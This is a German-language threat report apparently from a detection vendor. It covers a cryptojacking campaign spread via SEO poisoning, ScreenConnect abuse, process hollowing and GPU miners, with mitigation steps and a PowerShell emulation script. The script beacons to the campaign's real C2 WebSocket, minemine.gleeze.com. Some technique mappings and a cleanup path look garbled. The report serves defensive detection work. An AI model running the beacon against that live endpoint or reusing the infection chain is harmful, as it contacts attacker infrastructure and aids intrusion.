Von manipulierten Suchergebnissen zum GPU-Mining: Eine Cryptojacking-Kampagne mit ScreenConnect und .NET Utilities

SOC Prime Team

Folgen

Von manipulierten Suchergebnissen zum GPU-Mining: Eine Cryptojacking-Kampagne mit ScreenConnect und .NET Utilities

Detection stack

AIDR
Alert
ETL
Query

Bedrohungsbericht
Angriffsablauf
Erkennungen
Simulationen

Zusammenfassung

Diese Kampagne nutzt SEO-Vergiftung und manipulierte AI-Chatbot-Suchergebnisse, um Nutzer dazu zu verleiten, gefälschte Hardware-Überwachungstools herunterzuladen. Die trojanisierten Installer enthalten eine bösartige DLL, die in eine legitime Anwendung gelistet wird und heimlich ScreenConnect einsetzt. Angreifer nutzen dann ScreenConnect, um einen benutzerdefinierten RunPE-Dropper zu starten, der von Microsoft signierte .NET-Binärdateien aushöhlt und die nächste Nutzlast injiziert. Die letzte Phase lädt GPU-Mining-Tools herunter, wie z.B. gminer, lolMiner, und SRBMiner-MULTI, dann wird die Persistenz durch geplante Aufgaben, Registrierungsschlüssel und eine Startverknüpfung aufrechterhalten. Die Malware fügt auch Windows Defender-Ausschlüsse hinzu, um die Erkennungswahrscheinlichkeit zu verringern.

Untersuchung

Microsoft Defender Forscher haben die gesamte Infektionskette kartiert, einschließlich der DLL-Sideloading-Methode, des Missbrauchs von ScreenConnect als Fernverwaltungstool und der Verwendung eines benutzerdefinierten RunPE-Loaders namens SimpleRunPE.exe. Analysten stellten die ScreenConnect-Kommandozeilenargumente wieder her, identifizierten die Liste der signierten .NET-Binärdateien, die für Process Hollowing verwendet wurden, und dokumentierten einen Command-and-Control-Endpunkt, der mit einem festgelegten TLS-Zertifikat geschützt ist. Die Untersuchung deckte auch unterstützende Infrastruktur auf, wie z.B. bösartige Domains, IP-Adressen und DNS-Anbieterdetails, die mit der Kampagne verbunden sind.

Abmilderung

Verteidiger sollten cloudbasierte Schutzmaßnahmen aktivieren, Regeln zur Reduzierung der Angriffsfläche durchsetzen, ausführbare Dateien blockieren, die die Anforderungen an Reputation, Häufigkeit oder Alter nicht erfüllen, und Web- und Netzwerkschutz in Microsoft Defender for Endpoint aktivieren. Fernverwaltungstools wie ScreenConnect sollten deaktiviert werden, wo nicht notwendig oder streng kontrolliert werden, wo erforderlich, mit Überwachung auf nicht autorisierte geplante Aufgaben und verdächtige Registrierungsschlüssel. Alle von der Malware hinzugefügten Windows Defender-Ausschlüsse sollten sofort entfernt und die identifizierten bösartigen Domains und IP-Adressen blockiert werden.

Antwort

If RuntimeHost.exe or SimpleRunPE.exe wird in versteckten Cache-Verzeichnissen ausgeführt, isolieren Sie sofort den betroffenen Host, beenden Sie die zugehörige ScreenConnect-Sitzung und entfernen Sie alle Persistenzmechanismen, einschließlich geplanter Aufgaben, Rundschlüssel und Startverknüpfungen. Blockieren Sie die Domain minemine.gleeze.com und die beobachteten IP-Adressen, durchsuchen Sie dann das Umfeld für die aufgelisteten Miner-Binärdateien und autorun.dll. Stellen Sie schließlich die Defender-Schutzmaßnahmen wieder her und überprüfen Sie die Ausschlusseinstellungen auf nicht autorisierte Änderungen.

graph TB %% Klassendefinitionen classDef action fill:#99ccff classDef technique fill:#ffdd99 classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef process fill:#ffcc66 classDef persistence fill:#99ff99 classDef defense fill:#ff66cc classDef privilege fill:#ffb366 classDef c2 fill:#66ccff classDef discovery fill:#c2c2f0 %% Knoten action_initial_access[„Aktion – T1659 Content Injection SEO-Poisoning und KI-Chatbot-Links liefern bösartige ZIP-Dateien, die sich als Dienstprogramme tarnen.“] class action_initial_access action technique_event_trigger[„Technik – T1546.009 AppCert DLL autorun.dll wird neben einem legitimen Dienstprogramm platziert und beim Ausführen des Programms geladen.“] class technique_event_trigger technique process_msiexec[„Prozess – msiexec.exe“] class process_msiexec process technique_dll_injection[„Technik – T1055.001 Dynamic-Link Library Injection autorun.dll ruft msiexec auf, um die bösartige vcredist_x64.dll mit dem ScreenConnect-Installer unbemerkt zu installieren.“] class technique_dll_injection technique technique_proxy_execution[„Technik – T1218.007 Msiexec Proxy Execution msiexec führt den bösartigen Installer aus und richtet einen ScreenConnect-Client ein.“] class technique_proxy_execution technique malware_screenconnect[„Malware – ScreenConnect-Client“] class malware_screenconnect malware persistence_scheduled[„Persistenz – T1543 Geplante Aufgaben Aufgaben mit Namen wie „Windows System Health“ starten die Malware erneut.“] class persistence_scheduled persistence persistence_registry[„Persistenz – T1037.001 Logon-Skript Registry-Run-Keys (HKLM/HKCU\\Run\\WinSysCache) werden hinzugefügt.“] class persistence_registry persistence persistence_startup[„Persistenz – T1037.004 RC-Skript Eine Verknüpfung im Startup-Ordner verweist auf RuntimeHost.exe.“] class persistence_startup persistence defense_exclusions[„Defense Evasion – T1564.012 Datei-/Pfadausschlüsse & T1564.010 Prozessargument-Spoofing Fügt Windows-Defender-Ausschlüsse für Dateien und Prozesse hinzu.“] class defense_exclusions defense defense_impair[„Defense Evasion – T1562 Sicherheitsmaßnahmen beeinträchtigen Verwendet die Ausschlüsse zur Umgehung der AV-Erkennung.“] class defense_impair defense defense_sandbox[„Defense Evasion – T1497 Virtualisierungs-/Sandbox-Umgehung Benutzeraktivitätsprüfungen (T1497.002) und zeitbasierte Umgehung (T1497.003) brechen die Ausführung in Analyseumgebungen ab.“] class defense_sandbox defense defense_codesign[„Defense Evasion – T1553.002 Vertrauenskontrollen unterlaufen Bösartiger Code wird mittels Process Hollowing innerhalb von Microsoft-signierten .NET-Binärdateien ausgeführt.“] class defense_codesign defense privilege_hollowing[„Privilege Escalation – T1055.012 Process Hollowing SimpleRunPE startet eine legitime .NET-Binärdatei im angehaltenen Zustand und injiziert die Payload.“] class privilege_hollowing privilege c2_websocket[„Command and Control – T1102.002 Websocket Verschlüsselte Verbindung zu wss://minemine.gleeze.com:8443/ws mit TLS-Pinning.“] class c2_websocket c2 discovery_info[„Discovery – T1082 Systeminformationen, T1592.001 Hardware, T1592.002 Software Sammelt CPU-, GPU-, RAM-, Betriebssystem- und Sicherheitsproduktinformationen zur Bewertung der Mining-Fähigkeit.“] class discovery_info discovery %% Ablauf action_initial_access –>|führt zu| technique_event_trigger technique_event_trigger –>|lädt| process_msiexec process_msiexec –>|führt aus| technique_dll_injection technique_dll_injection –>|installiert| technique_proxy_execution technique_proxy_execution –>|installiert| malware_screenconnect malware_screenconnect –>|erstellt| persistence_scheduled malware_screenconnect –>|erstellt| persistence_registry malware_screenconnect –>|erstellt| persistence_startup malware_screenconnect –>|fügt hinzu| defense_exclusions defense_exclusions –>|ermöglicht| defense_impair defense_impair –>|unterstützt| defense_sandbox defense_sandbox –>|unterstützt durch| defense_codesign defense_codesign –>|ermöglicht| privilege_hollowing privilege_hollowing –>|etabliert| c2_websocket c2_websocket –>|empfängt| discovery_info

Angriffsfluss

Angriffserzählung & Befehle:
Ein Angreifer hat bereits eine gehehlte legitime Binärdatei auf das Opfersystem geliefert. Die Binärdatei initiiert nun einen persistente C2-Kanal über einen WebSocket Verbindung zu wss://minemine.gleeze.com:8443/ws. Um dies zu emulieren, verwenden wir ein PowerShell-Skript, das eine .NET ClientWebSocketerstellt, optional eine benutzerdefinierte TLS-Zertifikatvalidierungsrückruffunktion setzt (ähnelt dem Zertifikat-Pinning), und die Verbindung für eine kurze Zeit aufrechterhält.

Regressionstest-Skript:

# Simuliere C2-Kommunikation von einer gehöhlten Binärdatei
# Anforderungen: PowerShell 5+ (eingebaute .NET-Klassen)
$c2Url = 'wss://minemine.gleeze.com:8443/ws'

# Erstelle WebSocket-Client
$ws = [System.Net.WebSockets.ClientWebSocket]::new()

# OPTIONAL: Erzwinge Zertifikat-Pinning (akzeptiere nur einen bestimmten Fingerabdruck)
$allowedThumbprint = 'ABCD1234EF567890ABCD1234EF567890ABCD1234'  # Platzhalter
$handler = [System.Net.Http.HttpClientHandler]::new()
$handler.ServerCertificateCustomValidationCallback = {
    param($sender, $cert, $chain, $sslPolicyErrors)
    $cert.Thumbprint -eq $allowedThumbprint
}

try {
    Write-Host "Verbindung zum C2-Endpunkt $c2Url ..."
    $ws.ConnectAsync([System.Uri]::new($c2Url), [System.Threading.CancellationToken]::None).Wait()
    Write-Host "Verbindung hergestellt. Sende Beacon-Nutzlast..."

    # Sende ein Dummy-Beacon (JSON)
    $payload = '{ "beat": "alive", "ts": "' + (Get-Date).ToString('o') + '" }'
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($payload)
    $segment = [System.ArraySegment[byte]]::new($bytes)
    $ws.SendAsync($segment, [System.Net.WebSockets.WebSocketMessageType]::Text, $true, [System.Threading.CancellationToken]::None).Wait()

    Start-Sleep -Seconds 10   # Halte den Kanal für ein kurzes Zeitfenster offen
}
finally {
    Write-Host "WebSocket wird geschlossen..."
    $ws.Abort()
}

Aufräumbefehle:

# Sicherstellen, dass alle verbleibenden WebSocket-Prozesse beendet sind
Get-Process -Name powershell | Where-Object { $_.MainWindowTitle -match 'WebSocket' } | Stop-Process -Force
# Optional entfernen Sie temporäre Dateien, die im Test verwendet wurden
Remove-Item -Path "$env:TEMPC2Simulation*" -Force -ErrorAction SilentlyContinue

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten